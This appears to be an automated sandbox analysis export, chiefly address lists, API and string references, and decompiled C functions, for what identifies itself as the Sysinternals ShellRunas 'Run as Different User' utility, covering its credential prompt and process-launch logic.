0x004020c5
0x004020cd
0x004020e3
0x004020eb
0x004020fe
0x00402105
0x0040210c
0x00402110
0x00402114
0x00402118
0x0040211c
0x00402120
0x00402126
0x0040212c
0x00402130
0x00402134
0x00402138
0x0040213d
0x00402143
0x00402881
0x0040288f
0x00402897
0x0040289f
0x004028a7
0x004028ab
0x004028b3
0x004028bf
0x004028cb
0x004028dd
0x004028e1
0x004028e9
0x004028ed
0x004028f5
0x00402908
0x00402917
0x0040291f
0x00402921
0x00402923
0x00402925
0x0040295e
0x0040295e
0x00402966
0x0040296b
0x0040297c
0x0040297d
0x0040297e
0x00402989
0x00000000
0x00000000
0x00000000
0x00402927
0x00402927
0x0040292d
0x00402933
0x00402935
0x0040293c
0x00402942
0x00402947
0x00402947
0x00402958
0x0040295a
0x0040295a
0x00000000
0x00402927
0x00402150
0x00402159
0x0040215d
0x00402162
0x00402167
0x00000000
0x00000000
0x00402175
0x0040217a
0x0040217f
0x0040227f
0x00402287
0x0040228c
0x0040228f
0x00402291
0x004022d8
0x004022dd
0x004022e0
0x004022e2
0x00402321
0x00402329
0x0040232e
0x00402331
0x00402333
0x00402378
0x0040237d
0x00402380
0x00402382
0x00402384
0x00402387
0x0040238c
0x00402392
0x00402392
0x00402398
0x00402398
0x0040239a
0x0040239a
0x0040239e
0x0040239e
0x004023a1
0x004023b1
0x004023b8
0x004023c3
0x004023c8
0x004023cb
0x004023cd
0x004023d1
0x004023f2
0x004023f3
0x004023f4
0x004023f9
0x00402400
0x00402405
0x00402408
0x0040240a
0x0040240e
0x00000000
0x00000000
0x00000000
0x00000000
0x00402414
0x00402414
0x00402423
0x0040243a
0x00402451
0x0040245d
0x00402469
0x00402470
0x00402477
0x00402478
0x00402479
0x00402480
0x00402485
0x00402488
0x0040248a
0x0040248e
0x00000000
0x00000000
0x00402494
0x004024af
0x004024be
0x004024c7
0x004024d7
0x004024df
0x004024e6
0x004024ee
0x004024f4
0x004024f6
0x00402504
0x00402506
0x0040254b
0x0040254b
0x00402553
0x00000000
0x00000000
0x00402559
0x00402561
0x00000000
0x00000000
0x00402567
0x0040256f
0x00000000
0x00000000
0x00402575
0x0040257d
0x00000000
0x00000000
0x00402583
0x00402588
0x00000000
0x00000000
0x0040258e
0x00402596
0x00000000
0x00000000
0x0040259c
0x004025a4
0x00000000
0x00000000
0x004025aa
0x004025b2
0x00000000
0x00000000
0x004025b8
0x004025bd
0x00000000
0x00000000
0x004025c3
0x004025cb
0x00000000
0x00000000
0x004025d1
0x004025d9
0x00000000
0x00000000
0x004025df
0x004025e7
0x00000000
0x00000000
0x004025ed
0x004025f5
0x00000000
0x00000000
0x004025fb
0x00402603
0x00000000
0x00000000
0x00402609
0x00402611
0x00000000
0x00000000
0x00402617
0x0040261f
0x00000000
0x00000000
0x00402625
0x0040262d
0x00000000
0x00000000
0x00402633
0x0040263b
0x00000000
0x00000000
0x00402641
0x00402649
0x00000000
0x00000000
0x0040264f
0x00402657
0x00000000
0x00000000
0x0040265d
0x00402665
0x00000000
0x00000000
0x0040266b
0x00402673
0x00000000
0x00000000
0x00402679
0x00402681
0x00000000
0x00000000
0x00402687
0x0040268f
0x00000000
0x00000000
0x00402695
0x0040269d
0x00000000
0x00000000
0x004026a3
0x004026ab
0x00000000
0x00000000
0x004026b1
0x004026b9
0x00000000
0x00000000
0x004026bf
0x004026c7
0x00000000
0x00000000
0x004026cd
0x004026d5
0x00000000
0x00000000
0x004026db
0x004026e3
0x00000000
0x00000000
0x004026e9
0x004026f1
0x00000000
0x00000000
0x004026f7
0x004026ff
0x00000000
0x00000000
0x00402705
0x0040270d
0x00000000
0x00000000
0x00402713
0x0040271b
0x00000000
0x00000000
0x00402721
0x00402729
0x00000000
0x00000000
0x0040272f
0x00402737
0x00000000
0x00000000
0x0040273d
0x00402745
0x00000000
0x00000000
0x0040274b
0x00402753
0x00000000
0x00000000
0x00402759
0x00402761
0x00000000
0x00000000
0x00402767
0x0040276f
0x00000000
0x00000000
0x00402775
0x0040277d
0x00000000
0x00000000
0x00402783
0x0040278b
0x00000000
0x00000000
0x00402791
0x00402799
0x00000000
0x00000000
0x0040279f
0x004027a7
0x00000000
0x00000000
0x004027ad
0x004027b5
0x00000000
0x00000000
0x004027bb
0x004027c3
0x00000000
0x00000000
0x004027c9
0x004027d1
0x00000000
0x00000000
0x004027d7
0x004027df
0x00000000
0x00000000
0x004027e5
0x004027ed
0x00000000
0x00000000
0x004027f3
0x004027fb
0x00000000
0x00000000
0x00402801
0x00402809
0x00000000
0x00000000
0x0040280f
0x00402813
0x00402818
0x00000000
0x00000000
0x0040281e
0x00402820
0x00402868
0x00402868
0x00402873
0x0040287a
0x00000000
0x0040287a
0x00402828
0x0040282d
0x00000000
0x0040282d
0x00402515
0x00402527
0x0040252c
0x0040252f
0x00402531
0x00000000
0x00000000
0x00402533
0x0040253d
0x00402543
0x00402545
0x0040283b
0x00402840
0x00402840
0x00402845
0x00000000
0x00000000
0x00402847
0x00402849
0x0040284b
0x0040284e
0x00000000
0x00000000
0x00402852
0x0040285e
0x00402864
0x00402866
0x00000000
0x00000000
0x00000000
0x00402866
0x00000000
0x00402840
0x00000000
0x00402545
0x004024fe
0x00000000
0x004024fe
0x00000000
0x00402414
0x004023d9
0x004023de
0x00000000
0x004023de
0x00402335
0x00402338
0x00402355
0x00402355
0x00402359
0x00402359
0x0040235f
0x00402364
0x00402367
0x00000000
0x00402367
0x0040233a
0x00402347
0x0040234c
0x0040234f
0x00402351
0x00402353
0x00000000
0x00000000
0x00000000
0x00402353
0x004022e4
0x004022e7
0x00402304
0x00402304
0x00402308
0x00402308
0x00402310
0x00402315
0x00402318
0x00000000
0x00402318
0x004022ed
0x004022f6
0x004022fb
0x004022fe
0x00402300
0x00402302
0x00000000
0x00000000
0x00000000
0x00402302
0x00402293
0x00402296
0x004022b3
0x004022b3
0x004022b7
0x004022b7
0x004022bf
0x004022c4
0x004022c7
0x00000000
0x004022c7
0x004022a5
0x004022aa
0x004022ad
0x004022af
0x004022b1
0x00000000
0x00000000
0x00000000
0x004022b1
0x00402185
0x0040218c
0x00000000
0x00000000
0x0040219f
0x004021a4
0x004021a9
0x004021b5
0x004021b5
0x004021b8
0x004021b8
0x004021c0
0x00000000
0x00000000
0x004021d2
0x004021ee
0x004021f6
0x004021fa
0x004021fe
0x00402202
0x0040220d
0x00402217
0x00402234
0x00402239
0x0040223c
0x0040226a
0x00402276
0x00402276
0x00000000

APIs

_memset.LIBCMT ref: 00402091
_memset.LIBCMT ref: 004020AF
_memset.LIBCMT ref: 004020CD
_memset.LIBCMT ref: 004020EB
_memset.LIBCMT ref: 00402105

Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 00401819
Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 0040182E

__wcsicmp.LIBCMT ref: 0040215D
__wcsicmp.LIBCMT ref: 00402175
__wcsicmp.LIBCMT ref: 0040219F

Part of subcall function 0040346A: __wcsicmp_l.LIBCMT ref: 004034F0

SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,RunAsInvoker), ref: 004021B8
_memset.LIBCMT ref: 004021D2
_wcscpy_s.LIBCMT ref: 00402217
_wcscat_s.LIBCMT ref: 00402234
CreateProcessW.KERNEL32 ref: 00402262
GetLastError.KERNEL32(?,?,?,?,00000208,cmd /c start ), ref: 00402270
__wcsicmp.LIBCMT ref: 00402287
__wcsicmp.LIBCMT ref: 004022A5
__wcsicmp.LIBCMT ref: 004022D8
__wcsicmp.LIBCMT ref: 004022F6
__wcsicmp.LIBCMT ref: 00402329
__wcsicmp.LIBCMT ref: 00402347
__wcsicmp.LIBCMT ref: 00402378
_wcscpy_s.LIBCMT ref: 004023B1
_memset.LIBCMT ref: 00402423
_memset.LIBCMT ref: 0040243A
_memset.LIBCMT ref: 00402451
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000), ref: 004024EE
GetLastError.KERNEL32 ref: 004024F8

Part of subcall function 00403926: __wcslwr_s_l.LIBCMT ref: 00403930

EnumWindows.USER32(00402000,?), ref: 0040253D
Sleep.KERNEL32(0000000A), ref: 00402852
EnumWindows.USER32(00402000,00000000), ref: 0040285E
CloseHandle.KERNEL32(?), ref: 00402873
CloseHandle.KERNEL32(?), ref: 0040287A
LoadIconW.USER32 ref: 004028B7
LoadIconW.USER32(?,ICON), ref: 004028C3
LoadCursorW.USER32(00000000,00007F00), ref: 004028D2
RegisterClassExW.USER32 ref: 004028F5
CreateDialogParamW.USER32 ref: 00402908
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402921
IsDialogMessageW.USER32 ref: 0040292D
TranslateMessage.USER32(?), ref: 0040293C
DispatchMessageW.USER32 ref: 00402947
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402958
LocalFree.KERNEL32(?,?,AboutUsage,00000000,Function_00001D50,00000000,?,?,?,?,ICON), ref: 0040296B

Strings

Error launching application, xrefs: 00402823
/quiet, xrefs: 0040229F, 004022F0, 00402341
__COMPAT_LAYER, xrefs: 004021B0
W, xrefs: 0040295E
D, xrefs: 004024C7
ICON, xrefs: 00402887, 004028B9
D, xrefs: 00402202
SHELLRUNAS, xrefs: 004028ED
0, xrefs: 0040288F
/netonly, xrefs: 00402199, 00402372
/regnetonly, xrefs: 004022D2
/reg, xrefs: 00402281
cmd.exe, xrefs: 00402521
/raw, xrefs: 0040216F
Error launching program, xrefs: 004023D4
RunAsInvoker, xrefs: 004021AB
AboutUsage, xrefs: 00402902
/unreg, xrefs: 00402323
cmd /c start , xrefs: 004021DA

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: __wcsicmp$_memset$Message$CreateLoad$CloseDialogEnumErrorHandleIconLastProcessWindows_wcscpy_s$ClassCursorDispatchEnvironmentFreeLocalLogonParamRegisterSleepTranslateVariableWith__wcsicmp_l__wcslwr_s_l_wcscat_s
String ID: /netonly$/quiet$/raw$/reg$/regnetonly$/unreg$0$AboutUsage$D$D$Error launching application$Error launching program$ICON$RunAsInvoker$SHELLRUNAS$W$__COMPAT_LAYER$cmd /c start $cmd.exe
API String ID: 417924082-754762936
Opcode ID: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
Instruction ID: b9bcd2630ba5b8b6581695927ee2c04d685a99353c32d213ca7add1f89437002
Opcode Fuzzy Hash: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
Instruction Fuzzy Hash: 81228F71508300AFD728DB29C949B9BB7E8AB84305F04883EF598762D1D7BD9944CF6B

Uniqueness

Uniqueness Score: -1.00%

Function 00402CB0 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 195
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00402CB0(void* __ecx, WCHAR* __edi, void* __eflags, void* __fp0, char _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, char _a24, char _a28, intOrPtr _a32, char _a36, char _a40, intOrPtr _a44, char _a48, char _a56, WCHAR* _a60, char* _a64, WCHAR* _a68, WCHAR* _a72, char _a76, char _a78, char _a1104, char _a1106, signed int _a66600, signed int _a66640, intOrPtr _a66648, intOrPtr _a66652, intOrPtr _a66656, intOrPtr _a66660) {
				char _v0;
				char _v20;
				char _v24;
				char _v28;
				long _v32;
				intOrPtr _v36;
				char* _v40;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t69;
				_Unknown_base(*)()* _t79;
				_Unknown_base(*)()* _t81;
				long _t82;
				char* _t83;
				void* _t87;
				long _t88;
				long _t92;
				_Unknown_base(*)()* _t94;
				intOrPtr _t106;
				WCHAR* _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;
				signed int _t129;

				_t124 = __edi;
				E0040B320(0x10454);
				_t69 =  *0x413004; // 0xf284055d
				_a66640 = _t69 ^ _t128;
				_t127 = _a66656;
				_t125 = __ecx;
				_a20 = _a66652;
				_a12 = 0x100;
				_a8 = 0x151;
				_a1104 = 0;
				E00409280(__edi,  &_a1106, 0, 0xfffe);
				_a76 = 0;
				E00409280(_t124,  &_a78, 0, 0x402);
				_a32 = 0;
				_a36 = 0;
				_a40 = 0;
				_a44 = 0;
				_a28 = 0;
				_a24 = 0;
				_v0 = 0;
				_a4 = 0;
				_a48 = 0;
				_a16 = 0x201;
				E004036E5( &_a1104, 0x8000, L"Please enter credentials to use for ");
				E0040366B( &_a1104, 0x8000, _t125);
				_t129 = _t128 + 0x30;
				_a28 = 0x14;
				_a40 = L"Sysinternals Run as Different User (Netonly)";
				if(_a66648 == 0) {
					_a40 = L"Sysinternals Run as Different User";
				}
				_a36 =  &_a1104;
				_t79 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForWindowsCredentialsW");
				if(_t79 == 0) {
					 *_t124 = 0;
					_t81 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForCredentialsW");
					_a56 = 0;
					_a64 = 0;
					_a68 = 0;
					_a60 = 0;
					_a72 = 0;
					_a64 =  &_a1104;
					_t119 =  &_a56;
					_a56 = 0x14;
					_a68 = L"ShellRunas - Sysinternals: www.sysinternals.com";
					_t82 =  *_t81( &_a56, _t125, 0, 0,  &_a76, _a16, _t127, _a12,  &_a48, 0x40082);
					_t126 = _t82;
					if(_t82 != 0) {
						goto L12;
					}
					_t87 = E00403939( &_a36, 0x5c);
					_t129 = _t129 + 8;
					if(_t87 == 0) {
						_t119 = _v20;
						E004036E5(_v20, 0x201,  &_a36);
						_t129 = _t129 + 0xc;
						GetComputerNameW(_t124,  &_v32);
					}
					goto L9;
				} else {
					_t119 = _a66660;
					_t92 =  *_t79( &_a28, _a66660,  &_a24, 0, 0,  &_v0,  &_a4, 0, 0);
					_t126 = _t92;
					if(_t92 != 0) {
						L12:
						_t83 = _v40;
						if(_t83 == 0) {
							L17:
							return E0040318A(_t126, 0, _a66600 ^ _t129, _t119, _t124, _t126);
						}
						_t106 = _v36;
						if(_t106 == 0) {
							L16:
							__imp__CoTaskMemFree(_t83);
							goto L17;
						} else {
							goto L14;
						}
						do {
							L14:
							 *_t83 = 0;
							_t83 = _t83 + 1;
							_t106 = _t106 - 1;
						} while (_t106 != 0);
						_t83 = _v40;
						goto L16;
					}
					_a16 = _v28;
					_t94 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUnPackAuthenticationBufferW");
					_push( &_v24);
					_push(_t127);
					_push( &_a16);
					_push(_t124);
					_push( &_v20);
					_push( &_a40);
					_t119 = _v36;
					_push(_v32);
					_push(_v36);
					_push(1);
					if( *_t94() != 0) {
						L9:
						if( *_t124 != 0) {
							goto L12;
						}
						_t119 = _v20;
						_t88 =  &_a36;
						__imp__CredUIParseUserNameW(_t88, _v20, 0x201, _t124, _v32);
						L11:
						_t126 = _t88;
						goto L12;
					}
					_t88 = GetLastError();
					goto L11;
				}
			}

0x00402cb0
0x00402cb5
0x00402cba
0x00402cc1
0x00402cd1
0x00402ce0
0x00402ceb
0x00402cef
0x00402cf7
0x00402cff
0x00402d07
0x00402d17
0x00402d1c
0x00402d28
0x00402d2c
0x00402d30
0x00402d34
0x00402d45
0x00402d49
0x00402d4d
0x00402d51
0x00402d55
0x00402d59
0x00402d61
0x00402d74
0x00402d79
0x00402d83
0x00402d8b
0x00402d93
0x00402d95
0x00402d95
0x00402dae
0x00402db9
0x00402dc1
0x00402e53
0x00402e5d
0x00402e6a
0x00402e6e
0x00402e72
0x00402e76
0x00402e7a
0x00402e85
0x00402ea1
0x00402ea6
0x00402eae
0x00402eb6
0x00402eb8
0x00402ebc
0x00000000
0x00000000
0x00402ec5
0x00402eca
0x00402ecf
0x00402ed1
0x00402ee0
0x00402ee5
0x00402eee
0x00402eee
0x00000000
0x00402dc7
0x00402dd3
0x00402de7
0x00402de9
0x00402ded
0x00402f16
0x00402f16
0x00402f1c
0x00402f3b
0x00402f54
0x00402f54
0x00402f1e
0x00402f24
0x00402f34
0x00402f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f26
0x00402f26
0x00402f26
0x00402f28
0x00402f2b
0x00402f2b
0x00402f30
0x00000000
0x00402f30
0x00402e01
0x00402e0c
0x00402e16
0x00402e17
0x00402e1c
0x00402e1d
0x00402e22
0x00402e2b
0x00402e2c
0x00402e30
0x00402e31
0x00402e32
0x00402e38
0x00402ef4
0x00402ef7
0x00000000
0x00000000
0x00402efd
0x00402f09
0x00402f0e
0x00402f14
0x00402f14
0x00000000
0x00402f14
0x00402e3e
0x00000000
0x00402e3e

APIs

_memset.LIBCMT ref: 00402D07
_memset.LIBCMT ref: 00402D1C
_wcscpy_s.LIBCMT ref: 00402D61
_wcscat_s.LIBCMT ref: 00402D74
LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForWindowsCredentialsW), ref: 00402DB2
GetProcAddress.KERNEL32(00000000), ref: 00402DB9
LoadLibraryW.KERNEL32(Credui.dll,CredUnPackAuthenticationBufferW), ref: 00402E05
GetProcAddress.KERNEL32(00000000), ref: 00402E0C
GetLastError.KERNEL32 ref: 00402E3E
LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForCredentialsW), ref: 00402E56
GetProcAddress.KERNEL32(00000000), ref: 00402E5D
_wcschr.LIBCMT ref: 00402EC5
_wcscpy_s.LIBCMT ref: 00402EE0
GetComputerNameW.KERNEL32 ref: 00402EEE
CredUIParseUserNameW.CREDUI(?,?,00000201,?,?), ref: 00402F0E
CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 00402F35

Strings

CredUnPackAuthenticationBufferW, xrefs: 00402DF7
CredUIPromptForWindowsCredentialsW, xrefs: 00402D9D
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00402EAE
Sysinternals Run as Different User (Netonly), xrefs: 00402D8B
CredUIPromptForCredentialsW, xrefs: 00402E49
Credui.dll, xrefs: 00402DA9, 00402DFC, 00402E4E
Sysinternals Run as Different User, xrefs: 00402D95
Please enter credentials to use for , xrefs: 00402D23

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: AddressLibraryLoadProc$Name_memset_wcscpy_s$ComputerCredErrorFreeLastParseTaskUser_wcscat_s_wcschr
String ID: CredUIPromptForCredentialsW$CredUIPromptForWindowsCredentialsW$CredUnPackAuthenticationBufferW$Credui.dll$Please enter credentials to use for $ShellRunas - Sysinternals: www.sysinternals.com$Sysinternals Run as Different User$Sysinternals Run as Different User (Netonly)
API String ID: 3725605542-3868041870
Opcode ID: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
Instruction ID: a6c5cf5511b36f9deb478c5fb5984fdae67559a08a685e8c4f8a8008dfdfd372
Opcode Fuzzy Hash: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
Instruction Fuzzy Hash: A97151B1508341AFD714DF94CD859ABBBF8BFC8744F00492EF285A3290E7B59948CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004029C0 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004029C0(WCHAR* __ecx, void* __eflags, void* __fp0, WCHAR* _a4) {
				signed int _v4;
				signed int _v8;
				char _v86;
				short _v88;
				char _v166;
				short _v168;
				char _v204;
				char _v220;
				char _v284;
				char _v300;
				WCHAR* _v768;
				WCHAR* _v772;
				WCHAR* _v780;
				char _v784;
				intOrPtr* _v788;
				char _v792;
				intOrPtr* _v796;
				WCHAR* _v800;
				char _v804;
				void* _v808;
				signed int _v812;
				char _v844;
				char _v852;
				intOrPtr _v856;
				char _v864;
				char _v872;
				char _v876;
				signed int _v884;
				intOrPtr* _v892;
				char* _v896;
				intOrPtr* _v908;
				char _v924;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t68;
				signed int _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t82;
				signed int _t87;
				intOrPtr* _t89;
				signed int _t91;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t97;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr* _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr* _t108;
				char* _t110;
				signed int _t112;
				WCHAR* _t115;
				WCHAR* _t118;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t130;
				intOrPtr _t139;
				WCHAR* _t146;
				signed int _t147;
				signed int _t148;

				_t147 =  &_v808;
				_t68 =  *0x413004; // 0xf284055d
				_v4 = _t68 ^ _t147;
				_t146 = _a4;
				_t115 = __ecx;
				_v768 = __ecx;
				_v792 = 0x104;
				_v788 = 0;
				_v804 = 0;
				_v784 = 0;
				_v780 = 0;
				_v800 = 0;
				_v796 = 0;
				_v772 = 0;
				_v168 = 0;
				E00409280(0,  &_v166, 0, 0x4c);
				_v88 = 0;
				_t72 = E00409280(0,  &_v86, 0, 0x4c);
				_t148 = _t147 + 0x18;
				_t137 =  &_v800;
				__imp__SHGetMalloc( &_v800);
				_t145 = _t72;
				if(_t72 < 0) {
					L28:
					_t73 = _v788;
					if(_t73 != 0) {
						_t124 =  *_t73;
						_t137 =  *((intOrPtr*)(_t124 + 8));
						 *((intOrPtr*)( *((intOrPtr*)(_t124 + 8))))(_t73);
					}
					_t74 = _v808;
					if(_t74 != 0) {
						_t123 =  *_t74;
						_t137 =  *((intOrPtr*)(_t123 + 8));
						 *((intOrPtr*)( *((intOrPtr*)(_t123 + 8))))(_t74);
					}
					_t118 = _v800;
					if(_t118 != 0) {
						_t82 = _v804;
						_t137 =  *_t82;
						 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x14))))(_t82, _t118);
					}
					_t75 = _v792;
					if(_t75 != 0) {
						_t122 =  *_t75;
						_t137 =  *((intOrPtr*)(_t122 + 8));
						 *((intOrPtr*)( *((intOrPtr*)(_t122 + 8))))(_t75);
					}
					_t76 = _v804;
					if(_t76 != 0) {
						_t121 =  *_t76;
						_t137 =  *((intOrPtr*)(_t121 + 8));
						 *((intOrPtr*)( *((intOrPtr*)(_t121 + 8))))(_t76);
					}
					return E0040318A(_t145 & 0x0000ffff, _t115, _v8 ^ _t148, _t137, 0, _t145);
				}
				_t87 =  &_v792;
				__imp__SHGetDesktopFolder(_t87);
				_t145 = _t87;
				if(_t87 < 0) {
					goto L28;
				}
				_t137 = _v800;
				if(SearchPathW(0, _t115, L".exe", _v800, _t146,  &_v772) != 0) {
					_t89 = _v796;
					_t137 =  &_v804;
					_v784 = 0x1010000;
					_t91 =  *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0xc))))(_t89, 0, 0, _t146, 0,  &_v804,  &_v784);
					_t145 = _t91;
					__eflags = _t145;
					if(_t145 < 0) {
						goto L28;
					}
					__eflags = _v812 & 0x00010000;
					if((_v812 & 0x00010000) != 0) {
						__imp__CoInitialize(0);
						_t145 = _t91;
						__eflags = _t145;
						if(_t145 < 0) {
							goto L28;
						}
						__imp__CoCreateInstance(0x40d2fc, 0, 1,  &E0040D2CC,  &_v844);
						_t145 = _t91;
						__eflags = _t145;
						if(_t145 < 0) {
							L27:
							__imp__CoUninitialize();
							goto L28;
						}
						_t92 = _v864;
						_t139 =  *_t92;
						_t137 =  *((intOrPtr*)(_t139 + 0x14));
						_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t139 + 0x14))))(_t92, _v856);
						__eflags = _t145;
						if(_t145 < 0) {
							goto L27;
						}
						_t94 = _v872;
						_t137 =  &_v852;
						_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_t94))))(_t94, 0x40d2dc,  &_v852);
						__eflags = _t145;
						if(_t145 < 0) {
							goto L27;
						}
						_t97 = _v864;
						_t130 =  *_t97;
						_t137 =  *((intOrPtr*)(_t130 + 0x14));
						_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x14))))(_t97, _t115, 0);
						__eflags = _t145;
						if(_t145 < 0) {
							goto L27;
						}
						_t99 = _v896;
						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99))))(_t99, 0x40d2ec,  &_v872);
						__eflags = _t101;
						if(_t101 < 0) {
							L25:
							_t102 = _v908;
							_t137 = _v896;
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0xc))))(_t102, _t146, _v896,  &_v864, 0);
							L26:
							_t145 = _t104;
							goto L27;
						}
						_t105 = _v884;
						_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x18))))(_t105,  &_v876);
						__eflags = _t145;
						if(_t145 < 0) {
							L18:
							_t115 = 0;
							__eflags = 0;
							L19:
							_t108 = _v892;
							 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 8))))(_t108);
							__eflags = _t115;
							if(_t115 == 0) {
								goto L25;
							}
							_t137 = _v884;
							_t104 =  &_v204;
							_push(_t104);
							_push(0);
							_push( &_v284);
							_push(_v884);
							L00403172();
							__eflags = _t104;
							if(__eflags == 0) {
								_t110 =  &_v924;
								_push(_t110);
								_push(_t146);
								_push( &_v220);
								_t137 =  &_v300;
								_push( &_v300);
								L0040316C();
								__eflags = _t110 - 3;
								if(_t110 != 3) {
									_t145 = 0x80004023;
								}
								goto L27;
							}
							if(__eflags > 0) {
								_t104 = _t104 & 0x0000ffff | 0x80070000;
							}
							goto L26;
						}
						__eflags = _v884 & 0x00001000;
						if((_v884 & 0x00001000) == 0) {
							goto L18;
						}
						_t115 = 1;
						goto L19;
					} else {
						_t145 = 0;
						goto L28;
					}
				} else {
					_t112 = GetLastError();
					if(_t112 > 0) {
						_t145 = _t112 & 0x0000ffff | 0x80070000;
					} else {
						_t145 = _t112;
					}
					goto L28;
				}
			}

0x004029c0
0x004029c6
0x004029cd
0x004029d6
0x004029ea
0x004029ee
0x004029f2
0x004029fa
0x004029fe
0x00402a02
0x00402a06
0x00402a0a
0x00402a0e
0x00402a12
0x00402a16
0x00402a1e
0x00402a2e
0x00402a36
0x00402a3b
0x00402a3e
0x00402a43
0x00402a49
0x00402a4d
0x00402c33
0x00402c33
0x00402c39
0x00402c3b
0x00402c3d
0x00402c41
0x00402c41
0x00402c43
0x00402c49
0x00402c4b
0x00402c4d
0x00402c51
0x00402c51
0x00402c53
0x00402c59
0x00402c5b
0x00402c5f
0x00402c66
0x00402c66
0x00402c68
0x00402c6e
0x00402c70
0x00402c72
0x00402c76
0x00402c76
0x00402c78
0x00402c7e
0x00402c80
0x00402c82
0x00402c86
0x00402c86
0x00402ca7
0x00402ca7
0x00402a53
0x00402a58
0x00402a5e
0x00402a62
0x00000000
0x00000000
0x00402a68
0x00402a82
0x00402aa6
0x00402aaf
0x00402ab7
0x00402ac6
0x00402ac8
0x00402aca
0x00402acc
0x00000000
0x00000000
0x00402ad2
0x00402ada
0x00402ae4
0x00402aea
0x00402aec
0x00402aee
0x00000000
0x00000000
0x00402b06
0x00402b0c
0x00402b0e
0x00402b10
0x00402c2d
0x00402c2d
0x00000000
0x00402c2d
0x00402b16
0x00402b1e
0x00402b20
0x00402b27
0x00402b29
0x00402b2b
0x00000000
0x00000000
0x00402b31
0x00402b37
0x00402b46
0x00402b48
0x00402b4a
0x00000000
0x00000000
0x00402b50
0x00402b54
0x00402b56
0x00402b5e
0x00402b60
0x00402b62
0x00000000
0x00000000
0x00402b68
0x00402b7b
0x00402b7d
0x00402b7f
0x00402c13
0x00402c13
0x00402c1f
0x00402c29
0x00402c2b
0x00402c2b
0x00000000
0x00402c2b
0x00402b85
0x00402b96
0x00402b98
0x00402b9a
0x00402bad
0x00402bad
0x00402bad
0x00402baf
0x00402baf
0x00402bb9
0x00402bbb
0x00402bbd
0x00000000
0x00000000
0x00402bbf
0x00402bc3
0x00402bca
0x00402bcb
0x00402bd3
0x00402bd4
0x00402bd5
0x00402bda
0x00402bdc
0x00402bec
0x00402bf0
0x00402bf1
0x00402bf9
0x00402bfa
0x00402c01
0x00402c02
0x00402c07
0x00402c0a
0x00402c0c
0x00402c0c
0x00000000
0x00402c0a
0x00402bde
0x00402be5
0x00402be5
0x00000000
0x00402bde
0x00402b9c
0x00402ba4
0x00000000
0x00000000
0x00402ba6
0x00000000
0x00402adc
0x00402adc
0x00000000
0x00402adc
0x00402a84
0x00402a84
0x00402a8c
0x00402a9f
0x00402a8e
0x00402a8e
0x00402a8e
0x00000000
0x00402a8c

APIs

_memset.LIBCMT ref: 00402A1E
_memset.LIBCMT ref: 00402A36
SHGetMalloc.SHELL32(?), ref: 00402A43
SHGetDesktopFolder.SHELL32(?,?,?,?), ref: 00402A58
SearchPathW.KERNEL32(00000000,?,.exe,?,?,?,?,?,?), ref: 00402A7A
GetLastError.KERNEL32(?,.exe,?,?,?,?,?,?), ref: 00402A84

Strings

.exe, xrefs: 00402A73

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: _memset$DesktopErrorFolderLastMallocPathSearch
String ID: .exe
API String ID: 1184172398-4119554291
Opcode ID: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
